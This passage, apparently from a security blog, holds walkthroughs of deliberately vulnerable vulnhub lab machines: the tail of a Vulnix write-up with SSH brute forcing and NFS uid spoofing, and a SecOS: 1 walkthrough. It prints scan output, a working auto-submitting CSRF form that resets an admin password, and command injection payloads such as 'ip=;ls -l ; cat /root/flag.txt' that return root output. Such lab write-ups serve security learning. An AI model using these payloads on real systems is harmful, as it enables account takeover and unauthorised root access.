Clearly an account called `user` can be used to log in to the box. With no other information available we attempt to bruteforce the ssh service with this user account. After a few minutes we are able to bruteforce successfully! The credentials for this account are user:letmein. Now we can log in to the box as `user`.



Once we log in we see another user called vulnix. We take note of the uid and gid of this user (2008 in both cases). We shall attempt to create a user with the same uid and gid on our client box. Hopefully this will solve our permissions problem and we will be able to elevate our privileges to vulnix.

user@vulnix:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
.....
user:x:1000:1000:user,,,:/home/user:/bin/bash
vulnix:x:2008:2008::/home/vulnix:/bin/bash
statd:x:109:65534::/var/lib/nfs:/bin/false
user@vulnix:~$ cat /etc/group
root:x:0:
daemon:x:1:
.....
lpadmin:x:115:
sambashare:x:116:
vulnix:x:2008:
user@vulnix:~$


Now on the attacking box we create a test user with the same uid and gid.

id test
uid=2008(test) gid=2008(testers) groups=2008(testers)

Now after we mount the /home/vulnix directory we no longer see the permission problem!

Saturday, 9 January 2016

Walkthrough SecOS: 1

Mission : Get the root flag on `Pipe`, which is a deliberately vulnerable virtual machine hosted at https://www.vulnhub.com/. The virtual machine can be downloaded at https://www.vulnhub.com/entry/secos-1,88/. I quickly loaded up the virtual machine into my VMWare Player and I was good to go!

Detailed Steps for getting root:

I ran a quick network scan to identify the IP address of the Pipe VM. I use `host-only` networking for both my Pipe VM and Kali box.

# arp-scan --localnet
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
192.168.28.1 00:50:56:c0:00:01 VMware, Inc.
192.168.28.138 00:0c:29:9a:5b:b1 VMware, Inc.
192.168.28.254 00:50:56:eb:e9:c7 VMware, Inc.
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.086 seconds (122.72 hosts/sec). 3 responded

We identify the IP address of the new VM as 192.168.28.138. 

An nmap scan of the box shows that the box is running an http service on port 8081 and an ssh service on port 22.

Host is up (0.00065s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh (protocol 2.0)
| ssh-hostkey:
| 1024 9b:d9:32:f5:1d:19:88:d3:e7:af:f0:4e:21:76:7a:c8 (DSA)
| 2048 90:b0:3d:99:ed:5b:1b:e1:d4:e6:b5:dd:e9:70:89:f5 (RSA)
|_ 256 78:2a:d9:e3:63:83:24:dc:2a:d4:f6:4a:ac:2c:70:5a (ECDSA)
8081/tcp open http Node.js (Express middleware)
|_http-methods: GET
|_http-title: Secure Web App
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port22-TCP:V=6.47%I=7%D=1/8%Time=56908E80%P=i686-pc-linux-gnu%r(NULL,27
SF:,"SSH-2\.0-OpenSSH_6\.6p1\x20Ubuntu-2ubuntu1\r\n");
MAC Address: 00:0C:29:9A:5B:B1 (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.11 - 3.14
Uptime guess: 198.048 days (since Wed Jun 24 23:28:37 2015)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=251 (Good luck!)
IP ID Sequence Generation: All zeros


We run nikto against the webserver but don't find anything of much interest. We then dirbust the webserver, which reveals a bunch of interesting directories that we should look into.



It seems that the vulnerable application allows us to create a user account and have a look at the various pages on the website. We see that, among other things, there seem to be 3 users on the box, one of whom is the administrator. Also there is a way to send messages to the admin.



We also see an About page that tells us that the site has been developed using Node.js and MongoDB. At this point we try an authentication bypass seen in Node.js and MongoDB systems. A good discussion of it is here: Hacking Node.js and MongoDB, http://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb.html. It seems that the box is not vulnerable to this bypass. We begin to observe the webapp more closely and find that the login page source code has a comment which is a hint.




We have a look at the /hint page and its source code, which reveals that we should launch a CSRF-style attack on the administrator.




The hint page tells us that the administrator will visit any site running on 127.0.0.1 if he is asked to do so. The hint is clear that we should feed a URL to the administrator to visit. This can be done via the messaging feature of the webapp, which allows us to send messages to the administrator. Looking at the webapp again we see that there is a feature to change the password. We decide to trick the admin into changing his password to one we specify. For this we create an HTML page with hidden inputs that POSTs the data to /change-password.

<html>
<body>
<form name="changepass" method="post" action="http://127.0.0.1:8081/change-password">
<input type="hidden" name="username" value="spiderman">
<input type="hidden" name="password" value="abc123">
</form>
<script type="text/javascript">
document.changepass.submit();
</script>
</body>
</html>


We now ask the admin to view this page by sending him a message.


We hope that when the admin visits this page his password will get reset and we can login. Well after a few minutes we try logging in as admin and we see that our little trick has worked ! 

We log in to the admin's message board and see that he has a message from a user `pirate` who claims to have cracked his password.



We try ssh'ing into the box with these credentials and we are immediately logged in  ! 

Once we log in we see that there are a bunch of interesting files in the user's home directory.

spiderman@SecOS-1:~/vnwa$ ls -lrt
total 44
-rw-rw-r-- 1 spiderman spiderman 559 May 4 2014 package.json
-rw-rw-r-- 1 spiderman spiderman 1070 May 4 2014 LICENSE
drwxrwxr-x 2 spiderman spiderman 4096 May 4 2014 views
drwxrwxr-x 6 spiderman spiderman 4096 May 4 2014 node_modules
drwxrwxr-x 4 spiderman spiderman 4096 May 4 2014 public
-rwxrwxr-x 1 spiderman spiderman 7772 May 4 2014 server.js
drwxrwxr-x 2 spiderman spiderman 4096 May 5 2014 lib
drwxrwxr-x 2 spiderman spiderman 4096 May 7 2014 scripts
-rwxrwxr-x 1 spiderman spiderman 1981 Jan 10 01:00 internalServer.js.2
-rw-rw-r-- 1 spiderman spiderman 0 Jan 10 01:22 headers
-rwxrwxr-x 1 spiderman spiderman 1981 Jan 10 01:29 internalServer.js
spiderman@SecOS-1:~/vnwa$ ls -l views/
total 64
-rw-rw-r-- 1 spiderman spiderman 591 May 4 2014 about.ejs
-rw-rw-r-- 1 spiderman spiderman 13861 May 4 2014 bootstrap.ejs
-rw-rw-r-- 1 spiderman spiderman 740 May 4 2014 change-password.ejs
-rw-rw-r-- 1 spiderman spiderman 18 May 4 2014 footer.ejs
-rw-rw-r-- 1 spiderman spiderman 2048 May 4 2014 header.ejs
-rw-rw-r-- 1 spiderman spiderman 548 May 4 2014 hint.ejs
-rw-rw-r-- 1 spiderman spiderman 498 May 4 2014 index.ejs
-rw-rw-r-- 1 spiderman spiderman 754 May 4 2014 login.ejs
-rw-rw-r-- 1 spiderman spiderman 690 May 4 2014 messages.ejs
-rw-rw-r-- 1 spiderman spiderman 2114 May 4 2014 ping.ejs
-rw-rw-r-- 1 spiderman spiderman 910 May 4 2014 send-message.ejs
-rw-rw-r-- 1 spiderman spiderman 697 May 4 2014 sign-up.ejs
-rw-rw-r-- 1 spiderman spiderman 646 May 4 2014 users.ejs
spiderman@SecOS-1:~/vnwa$


If we do a quick directory listing, 2 things stand out: i) there is an internalServer running as root on the box; ii) there is an additional ping.ejs file which is not normally visible via the public-facing web interface.

We look at the contents of both the internalServer and ping.ejs files.

<body role="document">
<!-- Fixed navbar -->
<div class="navbar navbar-inverse navbar-fixed-top" role="navigation">
<div class="container">
<div class="navbar-header">
<button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
<span class="sr-only">Toggle navigation</span>
</button>
<a class="navbar-brand" href="/">Internal admin tools</a>
</div>
<div class="navbar-collapse collapse">
<ul class="nav navbar-nav">
</ul>
</div><!--/.nav-collapse -->
</div>
</div>
<div class="container">
<form class="form-signin" action="/" method="POST">
<h4 class="form-signin-heading">Enter the IP you want to ping</h4>
<input type="text" class="input-block-level" placeholder="127.0.0.1" name="ip"><br />
<button class="btn btn-large btn-primary" type="submit">Ping !</button>
</form>
<% if (typeof message != "undefined" && message != null && message != "") { %>
<div class="panel panel-default">
<div class="panel-heading">
<h3 class="panel-title">Ping result</h3>
</div>
<div class="panel-body"><%= message %></div>
</div>
<% } %>
</div> <!-- /container -->

It seems that besides the public-facing webapp there is an additional server running on the box on port 9000. This server provides a ping capability, perhaps for the admin to ping other systems. When we look at the code for the ping service we see that the exec API is called with the user-provided IP address without any input checks. We can inject code here, as the application does not sanitize the input data.

We can launch the command injection either via the web browser or from the command line. Let's see both approaches.

a) Command line: We can use wget or curl to post data to the internal server and inject our code in the POST request.

wget --post-data="ip=1;id" localhost:9000
--2016-01-10 01:44:34-- http://localhost:9000/
Resolving localhost (localhost)... ::1, 127.0.0.1
Connecting to localhost (localhost)|::1|:9000... failed: Connection refused.
Connecting to localhost (localhost)|127.0.0.1|:9000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2048 (2.0K) [text/html]
.......
<div class="panel panel-default">
<div class="panel-heading">
<h3 class="panel-title">Ping result</h3>
</div>
<div class="panel-body">uid=0(root) gid=0(root) groups=0(root)
</div>
</div>
</div> <!-- /container -->


Here we send a POST request with an ip value of 1 and inject our 'id' command along with it.

Similarly we can use curl to post data as well.

curl --data "ip=;ls -l ; cat /root/flag.txt" localhost:9000
....
.....
/div>
<div class="panel-body">total 77
drwxr-xr-x 2 root root 4096 Apr 25 2014 bin
drwxr-xr-x 4 root root 1024 Apr 25 2014 boot
drwxr-xr-x 15 root root 4100 Jan 10 00:40 dev
drwxr-xr-x 90 root root 4096 Jan 10 00:40 etc
drwxr-xr-x 4 root root 4096 Apr 25 2014 home
lrwxrwxrwx 1 root root 33 Apr 25 2014 initrd.img -&gt; boot/initrd.img-3.13.0-24-generic
drwxr-xr-x 21 root root 4096 Apr 25 2014 lib
drwx------ 2 root root 16384 Apr 25 2014 lost+found
drwxr-xr-x 3 root root 4096 Apr 25 2014 media
drwxr-xr-x 2 root root 4096 Apr 11 2014 mnt
drwxr-xr-x 4 root root 4096 Apr 25 2014 opt
dr-xr-xr-x 312 root root 0 Jan 10 00:40 proc
drwx------ 2 root root 4096 May 5 2014 root
drwxr-xr-x 18 root root 640 Jan 10 00:41 run
drwxr-xr-x 2 root root 12288 Apr 25 2014 sbin
drwxr-xr-x 2 root root 4096 Apr 16 2014 srv
dr-xr-xr-x 13 root root 0 Jan 10 00:40 sys
drwxrwxrwt 2 root root 4096 Jan 10 01:42 tmp
drwxr-xr-x 10 root root 4096 Apr 25 2014 usr
drwxr-xr-x 12 root root 4096 Apr 25 2014 var
lrwxrwxrwx 1 root root 30 Apr 25 2014 vmlinuz -&gt; boot/vmlinuz-3.13.0-24-generic
Hey,
Congrats, you did it !
The flag for this first (VM) is: MickeyMustNotDie.
Keep this flag because it will be needed for the next VM.
If you liked the Web application, the code is available on Github.
(https://github.com/PaulSec/VNWA)
There should be more VMs to come in the next few weeks/months.
Twitter: @PaulWebSec
GitHub : PaulSec
</div>
</div>
</div> <!-- /container -->
</body>
</html>


b) Web browser: In order to be able to see the internal webapp on our attacking machine we use the ssh reverse port forwarding technique with the ssh -L parameter. Via this method we make port 9000 of the victim machine available on our Kali machine at port 4545.

ssh -L 4545:127.0.0.1:9000 spiderman@192.168.28.138
spiderman@192.168.28.138's password:
Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic i686)
* Documentation: https://help.ubuntu.com/
...
...


Now we can access port 9000 of the internal web application